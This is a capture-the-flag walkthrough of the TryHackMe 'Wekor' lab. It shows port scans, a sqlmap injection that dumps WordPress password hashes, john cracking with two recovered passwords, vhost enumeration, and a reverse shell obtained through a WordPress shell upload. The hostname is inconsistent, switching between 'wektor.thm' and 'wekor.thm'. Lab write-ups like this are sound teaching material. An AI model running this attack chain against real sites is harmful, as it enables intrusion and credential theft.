Enumeration
Port Scan
I started with an Nmap scan, as usual:
monoloco@kali:~/Dokumente/THM/wekor$ nmap -sV -sC -oA nmap/output wektor.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-08 19:59 GMT
Nmap scan report for wektor.thm (10.10.88.16)
Host is up (0.078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
|_ 256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds
Next I had a look at every path listed in robots.txt:
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
Of these, only http://wektor.thm/comingreallysoon/ actually serves content; the rest return nothing useful.
That page points to wektor.thm/it-next.
After going through the it-next site in detail I could not find anything at first.
So I ran another Nmap scan, this time for UDP ports:
sudo nmap -sU wektor.thm
PORT STATE SERVICE
68/udp open|filtered dhcpc
631/udp open|filtered ipp
5353/udp open|filtered zeroconf
54711/udp open|filtered unknown
The UDP scan did not lead anywhere. Note that open|filtered only means Nmap got no reply at all (no UDP payload and no ICMP port-unreachable), so none of these ports is confirmed open.
Finally I found an SQL injection in the coupon code field of http://wekor.thm/it-next/it_cart.php. I saved the request to coupon.txt and pointed sqlmap at the coupon_code parameter; the wordpress database was reachable through the same injection, so I dumped its users table directly:
sqlmap -r coupon.txt -p coupon_code -D wordpress -T wp_users --dump
sqlmap dumped the wp_users table (user_login:user_pass):
admin:$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
wp_eagle:$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/
wp_yura:$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/
wp_jeffrey:$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10
Cracking the hashes with john (the four user:hash lines saved to a file named hash):
monoloco@kali:~/Dokumente/THM/wekor$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Remaining 3 password hashes with 3 different salts
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (wp_eagle)
soccer13 (wp_yura)
Virtual Hostname Enumeration
Running gobuster in vhost mode against wekor.thm:
gobuster vhost -w /usr/share/wordlists/dirb/common.txt wekor.thm
turned up the vhost site.wekor.thm. (gobuster vhost sends each word as a Host header of the form word.wekor.thm and reports responses that differ from the default; dirb's common.txt is a directory wordlist rather than a subdomain list, but it was enough here.)
At http://site.wekor.thm/wordpress/wp-admin I could log in with the cracked credentials.
From there I got a reverse shell by uploading a shell through the WordPress admin, following: https://www.hacknos.com/wordpress-shell-upload/